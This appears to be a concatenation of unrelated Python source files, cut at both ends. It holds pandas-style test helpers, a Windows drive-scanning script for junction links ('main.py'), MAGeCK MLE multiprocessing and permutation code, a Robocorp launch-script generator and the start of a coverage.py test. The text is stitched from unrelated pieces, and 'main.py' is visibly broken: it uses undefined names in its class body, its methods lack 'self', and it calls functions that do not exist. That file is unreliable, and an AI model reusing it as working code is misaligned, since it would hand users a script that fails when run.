dm = panel[item]
for j, col in enumerate(dm.columns):
dm[col][:i + j] = np.NaN
return panel
def add_nans_panel4d(panel4d):
for l, label in enumerate(panel4d.labels):
panel = panel4d[label]
add_nans(panel)
return panel4d
class TestSubDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
# Dependency checks. Copied this from Nipy/Nipype (Copyright of
# respective developers, license: BSD-3)
def package_check(pkg_name, version=None, app='pandas', checker=LooseVersion,
exc_failed_import=ImportError,
exc_failed_check=RuntimeError):
"""Check that the minimal version of the required package is installed.
Parameters
----------
pkg_name : string
Name of the required package.
version : string, optional
Minimal version number for required package.
app : string, optional
Application that is performing the check. For instance, the
name of the tutorial being executed that depends on specific
packages.
checker : object, optional
The class that will perform the version checking. Default is
distutils.version.LooseVersion.
exc_failed_import : Exception, optional
Class of the exception to be thrown if import failed.
exc_failed_check : Exception, optional
Class of the exception to be thrown if version check failed.
Examples
--------
package_check('numpy', '1.3')
package_check('networkx', '1.0', 'tutorial1')
"""
if app:
msg = '%s requires %s' % (app, pkg_name)
else:
msg = 'module requires %s' % pkg_name
if version:
msg += ' with version >= %s' % (version,)
try:
mod = __import__(pkg_name)
except ImportError:
raise exc_failed_import(msg)
if not version:
return
try:
have_version = mod.__version__
except AttributeError:
raise exc_failed_check('Cannot find version for %s' % pkg_name)
if checker(have_version) < checker(version):
raise exc_failed_check(msg)
def skip_if_no_package(*args, **kwargs):
"""Raise SkipTest if package_check fails
Parameters
----------
*args Positional parameters passed to `package_check`
*kwargs Keyword parameters passed to `package_check`
"""
from nose import SkipTest
package_check(exc_failed_import=SkipTest,
exc_failed_check=SkipTest,
*args, **kwargs)
#
# Additional tags decorators for nose
#
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
'timed out',
'Server Hangup',
'HTTP Error 503: Service Unavailable',
'502: Proxy Error',
'HTTP Error 502: internal error',
'HTTP Error 502',
'HTTP Error 503',
'HTTP Error 403',
'Temporary failure in name resolution',
'Name or service not known',
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on these exception types
_network_error_classes = (IOError, httplib.HTTPException)
if sys.version_info >= (3, 3):
_network_error_classes += (TimeoutError,)
def can_connect(url, error_classes=_network_error_classes):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(t, url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=_network_error_classes,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check for connectivity.
Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to supress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas.util.testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
SkipTest
Errors not related to networking will always be raised.
"""
from nose import SkipTest
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
raise SkipTest
try:
return t(*args, **kwargs)
except Exception as e:
errno = getattr(e, 'errno', None)
if not errno and hasattr(errno, "reason"):
errno = getattr(e.reason, 'errno', None)
if errno in skip_errnos:
raise SkipTest("Skipping test due to known errno"
" and error %s" % e)
try:
e_str = traceback.format_exc(e)
except:
e_str = str(e)
if any([m.lower() in e_str.lower() for m in _skip_on_messages]):
raise SkipTest("Skipping test because exception message is known"
" and error %s" % e)
if not isinstance(e, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
raise SkipTest("Skipping test due to lack of connectivity"
" and error %s" % e)
return wrapper
with_connectivity_check = network
class SimpleMock(object):
"""
Poor man's mocking object
Note: only works for new-style classes, assumes __getattribute__ exists.
>>> a = type("Duck",(),{})
>>> a.attr1,a.attr2 ="fizz","buzz"
>>> b = SimpleMock(a,"attr1","bar")
>>> b.attr1 == "bar" and b.attr2 == "buzz"
True
>>> a.attr1 == "fizz" and a.attr2 == "buzz"
True
"""
def __init__(self, obj, *args, **kwds):
assert(len(args) % 2 == 0)
attrs = kwds.get("attrs", {})
for k, v in zip(args[::2], args[1::2]):
# dict comprehensions break 2.6
attrs[k] = v
self.attrs = attrs
self.obj = obj
def __getattribute__(self, name):
attrs = object.__getattribute__(self, "attrs")
obj = object.__getattribute__(self, "obj")
return attrs.get(name, type(obj).__getattribute__(obj, name))
@contextmanager
def stdin_encoding(encoding=None):
"""
Context manager for running bits of code while emulating an arbitrary
stdin encoding.
>>> import sys
>>> _encoding = sys.stdin.encoding
>>> with stdin_encoding('AES'): sys.stdin.encoding
'AES'
>>> sys.stdin.encoding==_encoding
True
"""
import sys
_stdin = sys.stdin
sys.stdin = SimpleMock(sys.stdin, "encoding", encoding)
yield
sys.stdin = _stdin
def assertRaises(_exception, _callable=None, *args, **kwargs):
"""assertRaises that is usable as context manager or in a with statement
Exceptions that don't match the given Exception type fall through::
>>> with assertRaises(ValueError):
... raise TypeError("banana")
...
Traceback (most recent call last):
...
TypeError: banana
If it raises the given Exception type, the test passes
>>> with assertRaises(KeyError):
... dct = dict()
... dct["apple"]
If the expected error doesn't occur, it raises an error.
>>> with assertRaises(KeyError):
... dct = {'apple':True}
... dct["apple"]
Traceback (most recent call last):
...
AssertionError: KeyError not raised.
In addition to using it as a contextmanager, you can also use it as a
function, just like the normal assertRaises
>>> assertRaises(TypeError, ",".join, [1, 3, 5]);
"""
manager = _AssertRaisesContextmanager(exception=_exception)
# don't return anything if used in function form
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
def assertRaisesRegexp(_exception, _regexp, _callable=None, *args, **kwargs):
""" Port of assertRaisesRegexp from unittest in Python 2.7 - used in with statement.
Explanation from standard library:
Like assertRaises() but also tests that regexp matches on the string
representation of the raised exception. regexp may be a regular expression
object or a string containing a regular expression suitable for use by
re.search().
You can pass either a regular expression or a compiled regular expression object.
>>> assertRaisesRegexp(ValueError, 'invalid literal for.*XYZ',
... int, 'XYZ');
>>> import re
>>> assertRaisesRegexp(ValueError, re.compile('literal'), int, 'XYZ');
If an exception of a different type is raised, it bubbles up.
>>> assertRaisesRegexp(TypeError, 'literal', int, 'XYZ');
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: 'XYZ'
>>> dct = dict()
>>> assertRaisesRegexp(KeyError, 'pear', dct.__getitem__, 'apple');
Traceback (most recent call last):
...
AssertionError: "pear" does not match "'apple'"
You can also use this in a with statement.
>>> with assertRaisesRegexp(TypeError, 'unsupported operand type\(s\)'):
... 1 + {}
>>> with assertRaisesRegexp(TypeError, 'banana'):
... 'apple'[0] = 'b'
Traceback (most recent call last):
...
AssertionError: "banana" does not match "'str' object does not support \
item assignment"
"""
manager = _AssertRaisesContextmanager(exception=_exception, regexp=_regexp)
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
class _AssertRaisesContextmanager(object):
"""handles the behind the scenes work for assertRaises and assertRaisesRegexp"""
def __init__(self, exception, regexp=None, *args, **kwargs):
self.exception = exception
if regexp is not None and not hasattr(regexp, "search"):
regexp = re.compile(regexp, re.DOTALL)
self.regexp = regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
expected = self.exception
if not exc_type:
name = getattr(expected, "__name__", str(expected))
raise AssertionError("{0} not raised.".format(name))
if issubclass(exc_type, expected):
return self.handle_success(exc_type, exc_value, traceback)
return self.handle_failure(exc_type, exc_value, traceback)
def handle_failure(*args, **kwargs):
# Failed, so allow Exception to bubble up
return False
def handle_success(self, exc_type, exc_value, traceback):
if self.regexp is not None:
val = str(exc_value)
if not self.regexp.search(val):
e = AssertionError('"%s" does not match "%s"' %
(self.regexp.pattern, str(val)))
raise_with_traceback(e, traceback)
return True
@contextmanager
def assert_produces_warning(expected_warning=Warning, filter_level="always", clear=None):
"""
Context manager for running code that expects to raise (or not raise)
warnings. Checks that code raises the expected warning and only the
expected warning. Pass ``False`` or ``None`` to check that it does *not*
raise a warning. Defaults to ``exception.Warning``, baseclass of all
Warnings. (basically a wrapper around ``warnings.catch_warnings``).
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearning these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [ clear ]
for m in clear:
try:
m.__warningregistry__.clear()
except:
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if (expected_warning and issubclass(actual_warning.category,
expected_warning)):
saw_warning = True
else:
extra_warnings.append(actual_warning.category.__name__)
if expected_warning:
assert saw_warning, ("Did not see expected warning of class %r."
% expected_warning.__name__)
assert not extra_warnings, ("Caused unexpected warning(s): %r."
% extra_warnings)
def skip_if_no_ne(engine='numexpr'):
import nose
_USE_NUMEXPR = pd.computation.expressions._USE_NUMEXPR
if engine == 'numexpr':
try:
import numexpr as ne
except ImportError:
raise nose.SkipTest("numexpr not installed")
if not _USE_NUMEXPR:
raise nose.SkipTest("numexpr disabled")
if ne.__version__ < LooseVersion('2.0'):
raise nose.SkipTest("numexpr version too low: "
"%s" % ne.__version__)
def disabled(t):
t.disabled = True
return t
class RNGContext(object):
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def use_numexpr(use, min_elements=expr._MIN_ELEMENTS):
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
# Also provide all assert_* functions in the TestCase class
for name, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isfunction(obj) and name.startswith('assert'):
setattr(TestCase, name, staticmethod(obj))
def test_parallel(num_threads=2):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image: https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
|
main.py
|
import multiprocessing
import os
import pickle
import sys
import win32api
storefile = '.\\store.bin'
class junction:
def __init__(self):
self.src = ""
self.links = []
self.link = []
self.dict = {}
self.key = self.src
self.val = self.links
self.prtline = ""
self.tabs = 20
sp1 = '\t' * (tabs - get_lnsrc(junktion[0]))
def src(pth):
path = os.path.realpath(pth)
return path
def path(pth): # src = os.path.realpath(pth)
path = os.path.abspath(pth)
return path
def lnsrc(pth):
charsin = len(pth)
# tchain = '\t\t\t\t'
lnblk = int((charsin + (4 - (charsin % 4))) / 4)
return lnblk
def make(link):
new = [get_src(link), get_path(link)]
store_dict = get_store(storefile)
junction = make_entry(get_store(storefile), new)
store_dict[list(junction.keys())[0]] = junction[list(junction.keys())[0]]
return (store_dict)
def prtline(junktion, tabs):
sp1 = '\t' * (tabs - get_lnsrc(junktion[0]))
sp2 = '\t' * 5
line = f'{junktion[0]}{sp1}{make_prtsign(junktion[0])}{sp2}{junktion[1]}'
return line
def make_prtsign(path):
if os.path.exists(path):
symbol = "<-"
else:
symbol = "(dead link)"
return symbol
def get_drives():
drives = win32api.GetLogicalDriveStrings()
drives = drives.split('\000')[: -1]
return drives
def get_store(path):
with open(path, 'rb') as storage:
data = storage.read()
store = pickle.loads(data)
return store
def printout(tmp):
do_writeover(get_path(tmp))
def make_entry(storedct, lst):
key = lst[0]
value = []
# if key in storedct:
# q value = storedct[key]
val = value.append(lst[1])
entry = {f'{key}': f'{value}'}
return entry
def is_jlnk(path: str) -> bool:
try:
return bool(os.readlink(path))
except OSError:
return False
def make_prtline(junktion, tabs=20):
sp1 = '\t' * (tabs - get_lnsrc(junktion[0]))
sp2 = '\t' * 5
line = f'{junktion[0]}{sp1}{make_prtsign(junktion[0])}{sp2}{junktion[1]}'
return line
def do_writeout(line, action):
switch = {
"over": f'\r\r\r{line}\n',
"new" : f'\r\r{line}'
}
sys.stdout.write(switch.get(action))
def do_save(storage, store):
with open(storage, "wb") as binstore:
pickle.dump(store, binstore)
def walk(drives, callback):
for drive in drives:
for current, folder, file in os.walk(drive, topdown=True):
callback(current)
def hit(link):
item = junction(link)
do_save(storefile, item.make(link))
do_writeout(make_prtline([item.src(link), item.path(link)]), "new")
def test(path):
if is_jlnk(path):
hit(path)
return
def main():
all_drives = get_drives()
do_writeout(all_drives, "new")
proc = multiprocessing.Process(target=walk, args=(all_drives, test))
proc.start(), proc.join()
# with concurrent.futures.ProcessPoolExecutor() as proc:
# walk = proc.submit(do_walk, all_drives, callback)
#
# if walk.done():
# do_writenew("finished scanning drives.")
userinput = input("\n\n\nenter Q to quit:")
if ("q" in userinput) | (proc.exitcode == 0):
do_writeout("Quitting ...", "new")
if __name__ == '__main__':
main()
|
mlemultiprocessing.py
|
'''
MAGeCK MLE multiprocessing
'''
import re
import sys
import logging
import multiprocessing
import copy
import numpy as np
import signal
from mageck.mleem import iteratenbem
# debug
try:
from IPython.core.debugger import Tracer
except:
pass
def thread_p_func(dinst,args,iteratenbemargs,returndict):
'''
functions for multithreading
Parameters:
dist
A dictionary of instances
iteratenbemargs
A dictionary of arguments in iteratenbem() function
'''
name = multiprocessing.current_process().name
ngene=0
logging.info(name+': total '+str(len(dinst))+ ' instances.')
for (tgid,tginst) in list(dinst.items()):
if ngene % 1000 ==1 or args.debug:
logging.info(name+': Calculating '+tgid+' ('+str(ngene)+') ... ')
iteratenbem(tginst,**iteratenbemargs)
returndict[tgid]=tginst
ngene+=1
def runem_multiproc(allgenedict,args,nproc=1, argsdict={}):
'''
Calling iternatembem using different number of threads
Arguments:
allgenedict:
a dictionary of all gene instances
args:
arguments
nproc
The number of threads
argsdict
Positional arguments for iteratenbem
'''
# separate dicts
instdictlist=[]
mnger=multiprocessing.Manager()
retdict=mnger.dict()
if nproc<=0:
logging.error('Error: incorrect number of threads.')
sys.exit(-1)
else:
ngene=0
instdictlist=[]
for i in range(nproc):
instdictlist.append({})
for (tgid,tginst) in list(allgenedict.items()):
nsg=tginst.nb_count.shape[1]
nbeta1=tginst.design_mat.shape[1]-1 # the number of betas excluding the 1st beta (baseline beta)
if nsg>=args.max_sgrnapergene_permutation:
logging.info('Skipping gene '+tgid+' from MLE calculation since there are too many sgRNAs. To change, revise the --max-sgrnapergene-permutation option.')
tginst.beta_estimate=np.array([0.0]*(nsg+nbeta1))
tginst.beta_pval=np.array([1.0]*(nbeta1))
tginst.beta_zscore=np.array([0.0]*(nbeta1))
tginst.beta_pval_pos=np.array([1.0]*(nbeta1))
tginst.beta_pval_neg=np.array([1.0]*(nbeta1))
continue
targetlistid=ngene %nproc
instdictlist[targetlistid][tgid]=tginst
ngene+=1
# start jobs
jobs=[]
if True:
for i in range(nproc):
j=multiprocessing.Process(target=thread_p_func, name='Thread '+str(i),args=(instdictlist[i],args,argsdict,retdict))
jobs.append(j)
j.start()
logging.info(j.name+' started.')
for jj in jobs:
jj.join()
logging.info(jj.name+' completed.')
else:
# solve ctrl+c issue in https://stackoverflow.com/questions/11312525/catch-ctrlc-sigint-and-exit-multiprocesses-gracefully-in-python
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
mp_pool=multiprocessing.Pool(nproc)
signal.signal(signal.SIGINT, original_sigint_handler)
try:
for i in range(nproc):
j=mp_pool.apply_async(func=thread_p_func, args=(instdictlist[i],args,argsdict,retdict))
logging.info('Thread '+str(i)+' started.')
except KeyboardInterrupt:
mp_pool.terminate()
else:
mp_pool.close()
mp_pool.join()
# post processing
logging.info('All threads completed.')
# save the instance
# Tracer()()
for tgid in list(retdict.keys()):
tginst=retdict[tgid]
allgenedict[tgid]=tginst
def iteratenbem_permutation(genedict,args,sg_per_gene=-1,background_genedict=None,debug=True,nround=100,allgenedict=None,removeoutliers=False,size_factor=None):
'''
Perform permutation test
Parameters:
genedict
A dictionary of gene structures
args
Parameters
sg_per_gene
Specify the number of sgRNAs per gene during permutation. Set this number when permuting per gene group. Default is -1 (use the same as the target gene).
background_genedict
A background dictionary of gene structures. If none, set it the same as genedict
debug
Whether to print debug information
nround
Number of rounds for permutation
allgenedict
The original dict of genes (only used for permutation)
removeoutliers
parameters to pass to iteratenbem
size_factor
size factor
'''
if background_genedict is None:
background_genedict=genedict
logging.info('Start permuting '+str(nround)+' rounds ...')
allsg=[]
#desmat=genedict[genedict.keys()[0]].design_mat
desmat=list(genedict.values())[0].design_mat
nbeta1=desmat.shape[1]-1
for (geneid, geneinst) in list(background_genedict.items()):
nsg=geneinst.nb_count.shape[1]
nsample=geneinst.nb_count.shape[0]
countmat=geneinst.nb_count.getT()
sgitem=[(geneinst.w_estimate[i],countmat[i]) for i in range(nsg)]
allsg+=sgitem
logging.info('Collecting '+str(len(allsg))+' sgRNAs from '+str(len(background_genedict))+' genes.')
#
if allgenedict is None:
genedictcopy=copy.deepcopy(background_genedict)
else:
genedictcopy=copy.deepcopy(allgenedict)
ngene=len(genedictcopy)
betazeros=np.zeros((nround*ngene,nbeta1))
#
betaz_id=0
for nrd in range(nround):
np.random.shuffle(allsg)
#
logging.info('Permuting round '+str(nrd)+' ...')
nid=0
# randomly assigning sgRNAs to genes
for (geneid, geneinst) in list(genedictcopy.items()):
# specify the number of sgs for this gene structure
if sg_per_gene == -1:
nsg=geneinst.nb_count.shape[1]
else:
nsg=sg_per_gene
nsample=geneinst.nb_count.shape[0]
selitem=allsg[nid:nid+nsg]
countmat=np.vstack([x[1] for x in selitem])
w_es=np.array([x[0] for x in selitem])
geneinst.nb_count=countmat.getT()
geneinst.w_estimate=w_es
nid+=nsg
if nid>= len(allsg):
nid=0
np.random.shuffle(allsg)
# end gene loop
#iteratenbem(geneinst,debug=False,estimateeff=True,updateeff=False,removeoutliers=removeoutliers,size_factor=size_factor,logem=False)
argsdict={'debug':False,'estimateeff':True,'updateeff':False,'removeoutliers':removeoutliers,'size_factor':size_factor,'logem':False}
runem_multiproc(genedictcopy,args,nproc=args.threads,argsdict=argsdict)
for (geneid, geneinst) in list(genedictcopy.items()):
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
# Tracer()()
betazeros[betaz_id,:]=beta_es
betaz_id+=1
# end gene loop
# end permutation
logging.info('Assigning p values...')
assign_p_value_from_permuted_beta(betazeros,genedict)
return betazeros
def assign_p_value_from_permuted_beta(betazeros,genedict):
'''
Assigning p values to each gene based on the permutated beta scores
'''
ncompare=betazeros.shape[0]*1.0
for (geneid, geneinst) in list(genedict.items()):
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
cp_u0=np.sum(betazeros>beta_es,axis=0)
cp_u1=np.sum(betazeros<beta_es,axis=0)
cp_ustack=np.vstack((cp_u0/ncompare,cp_u1/ncompare))
cp_minval=np.min(cp_ustack,axis=0)
#cp_minvec=np.array(cp_minval)[0]
cp_minvec=cp_minval*2
geneinst.beta_permute_pval=cp_minvec
geneinst.beta_permute_pval_neg=cp_ustack[1]
geneinst.beta_permute_pval_pos=cp_ustack[0]
# Tracer()()
def iteratenbem_permutation_by_nsg(genedict,args,debug=True,size_f=None):
'''
Perform permutation test, grouped by the number of sgrnas per gene
Parameters:
genedict
A dictionary of gene structures
args
Parameters
debug
Whether to print debug information
size_f
size factor
'''
genedict_group={}
# set up background gene group
bg_genedict={}
if args.control_sgrna is not None:
controlsglist=[line.strip() for line in open(args.control_sgrna)]
ncontrolsg=0
for (geneid, geneinst) in list(genedict.items()):
sgid=geneinst.sgrnaid
nsginctrl=sum([1 for x in sgid if x in controlsglist])
if nsginctrl>0:
bg_genedict[geneid]=geneinst
ncontrolsg+=len(sgid)
if nsginctrl <len(sgid):
logging.error('Gene '+geneid+' consists of both negative controls and non-negative controls. This is not allowed -- please check your negative control sgRNA list.')
sys.exit(-1)
if len(bg_genedict)==0:
logging.error('Cannot find genes containing negative control sgRNA IDs.')
sys.exit(-1)
logging.info('Using '+str(len(bg_genedict))+' genes and '+str(ncontrolsg)+' sgRNAs as negative controls for permutation...')
else:
bg_genedict=genedict
# assign genes to groups according to the number of sgRNAs per gene
for (geneid, geneinst) in list(genedict.items()):
nsg=geneinst.nb_count.shape[1]
if nsg not in genedict_group:
genedict_group[nsg]={}
genedict_group[nsg][geneid]=geneinst
# perform permutation based on gene groups
ngene_keys=sorted(genedict_group.keys())
last_permuted_beta=None
for ngene_i in range(len(ngene_keys)):
ngene=ngene_keys[ngene_i]
this_genedict=genedict_group[ngene]
if args.max_sgrnapergene_permutation>=ngene:
logging.info('Permuting groups of gene with '+str(ngene)+' sgRNAs per gene. Group progress: '+str(ngene_i+1)+'/'+str(len(genedict_group)))
last_permuted_beta=iteratenbem_permutation(this_genedict,args,sg_per_gene=ngene,background_genedict=bg_genedict,nround=args.permutation_round,allgenedict=genedict,removeoutliers=args.remove_outliers,size_factor=size_f)
else:
logging.info('Groups of gene with '+str(ngene)+' sgRNAs per gene: assigning p values based on previous group results. Group progress: '+str(ngene_i+1)+'/'+str(len(genedict_group)))
if last_permuted_beta is None:
logging.error('No permutation data found. Please increase the value of --max-sgrnapergene-permutation.')
sys.exit(-1)
assign_p_value_from_permuted_beta(last_permuted_beta,this_genedict)
|
run_with_env.py
|
import pathlib
from typing import Dict, List, Optional, Tuple
import sys
import os
import itertools
from functools import partial
import threading
import time
from robocorp_ls_core.robotframework_log import get_logger
log = get_logger(__name__)
def create_run_with_env_code(
robo_env: Dict[str, str], base_executable_and_args: List[str]
) -> str:
"""
:param robo_env:
This is the environment
-- if using RCC it's collected through something as:
rcc holotree variables --space <space_name> -r <robot_path> -e <env_json_path> --json
:param executable:
This is the executable which should be called (usually the path to python.exe)
"""
set_vars = []
as_dict: Dict[str, str] = {}
found_new_line = False
for key, value in robo_env.items():
if sys.platform == "win32":
# Reference (just text, not code): https://stackoverflow.com/a/16018942/110451
value = value.replace("^", "^^")
value = value.replace("%", "%%")
value = value.replace("!", "^!")
value = value.replace("|", "^|")
value = value.replace("&", "^&")
value = value.replace(">", "^>")
value = value.replace("<", "^<")
value = value.replace("'", "^'")
if "\n" in value or "\r" in value:
found_new_line = True
value = value.replace("\r\n", "\n").replace("\r", "\n")
value = value.replace("\n", "!__NEW_LINE_IN_ENV__!")
set_vars.append(f'SET "{key}={value}"')
else:
# Reference (just text, not code): https://stackoverflow.com/a/20053121/110451
value = value.replace("'", "'\\''")
value = f"'{value}'"
set_vars.append(f"export {key}={value}")
as_dict[key] = value
set_vars_as_str = "\n".join(set_vars)
if found_new_line:
if sys.platform == "win32":
new_line_preamble = """
setlocal EnableDelayedExpansion
(set __NEW_LINE_IN_ENV__=^
%=Do not remove this line=%
)
"""
set_vars_as_str = new_line_preamble + set_vars_as_str
import subprocess
if sys.platform == "win32":
shebang = "@echo off"
executable_with_args = f"{subprocess.list2cmdline(base_executable_and_args)} %*"
else:
shebang = "#!/usr/bin/env bash"
executable_with_args = (
f'{subprocess.list2cmdline(base_executable_and_args)} "$@"'
)
code = f"""{shebang}
{set_vars_as_str}
{executable_with_args}
"""
return code
_next_number: "partial[int]" = partial(next, itertools.count())
def _compute_path_for_env(temp_dir: Optional[str] = None) -> pathlib.Path:
import tempfile
if not temp_dir:
temp_dir = os.path.join(tempfile.gettempdir(), "rf-ls-run")
os.makedirs(temp_dir, exist_ok=True)
f = tempfile.mktemp(
suffix=(".bat" if sys.platform == "win32" else ".sh"),
prefix="run_env_%02d_" % _next_number(),
dir=temp_dir,
)
_delete_in_thread(temp_dir)
return pathlib.Path(f)
def _delete_in_thread(temp_dir) -> threading.Thread:
t = threading.Thread(target=_delete_old, args=(temp_dir,))
t.daemon = True
t.start()
return t
def _delete_old(temp_dir: str):
try:
# Remove files only after 2 days.
one_day_in_seconds = 86400
delete_older_than = time.time() - (one_day_in_seconds * 2)
f = pathlib.Path(temp_dir)
for entry in os.scandir(f):
if entry.name.startswith("run_env_"):
if entry.stat().st_mtime < delete_older_than:
remove = f / entry.name
try:
remove.unlink()
except:
log.debug("Unable to remove: %s", remove)
except:
log.exception("Error removing old launch files.")
def write_as_script(code: str, script_path: pathlib.Path):
script_path.write_text(code, "utf-8", "replace")
if sys.platform != "win32":
# We need to make it executable...
import stat
st = os.stat(str(script_path))
os.chmod(str(script_path), st.st_mode | stat.S_IEXEC)
def disable_launch_env_script():
return os.environ.get("ROBOTFRAMEWORK_LS_LAUNCH_ENV_SCRIPT", "1").lower() in (
"0",
"false",
)
def _update_command_line_to_write_pid(cmdline: List[str], env: dict, write_pid_to: str):
from robocorp_ls_core import run_and_save_pid
new_cmdline = [sys.executable, run_and_save_pid.__file__, write_pid_to] + cmdline
return new_cmdline, env
def update_cmdline_and_env(
cmdline: List[str], env: Dict[str, str], write_pid_to: Optional[str] = None
) -> Tuple[List[str], Dict[str, str]]:
"""
Ideally only this function is actually used from this module.
It receives an existing command line and environment and provides a new
command line and environment to be used depending which should have the
same effect when running.
:param write_pid_to: if passed, the launch will be made in a way that
a wrapper script is used to launch the script and then write the
pid of the launched executable to the passed file.
"""
if write_pid_to:
cmdline, env = _update_command_line_to_write_pid(cmdline, env, write_pid_to)
embed_args = 3
else:
embed_args = 1
if disable_launch_env_script():
return cmdline, env
set_env_and_run_code = create_run_with_env_code(env, cmdline[:embed_args])
if len(set_env_and_run_code) > 240:
script_path = _compute_path_for_env()
write_as_script(set_env_and_run_code, script_path)
new_cmdline = [str(script_path)] + cmdline[embed_args:]
return new_cmdline, {}
return cmdline, env
|
test_data.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for coverage.data"""
import glob
import os
import os.path
import re
import sqlite3
import threading
import mock
from coverage.data import CoverageData, combine_parallel_data
from coverage.data import add_data_to_hash, line_counts
from coverage.debug import DebugControlString
from coverage.files import PathAliases, canonical_filename
from coverage.misc import CoverageException
from tests.coveragetest import CoverageTest
LINES_1 = {
'a.py': {1: None, 2: None},
'b.py': {3: None},
}
SUMMARY_1 = {'a.py': 2, 'b.py': 1}
MEASURED_FILES_1 = ['a.py', 'b.py']
A_PY_LINES_1 = [1, 2]
B_PY_LINES_1 = [3]
LINES_2 = {
'a.py': {1: None, 5: None},
'c.py': {17: None},
}
SUMMARY_1_2 = {'a.py': 3, 'b.py': 1, 'c.py': 1}
MEASURED_FILES_1_2 = ['a.py', 'b.py', 'c.py']
ARCS_3 = {
'x.py': {
(-1, 1): None,
(1, 2): None,
(2, 3): None,
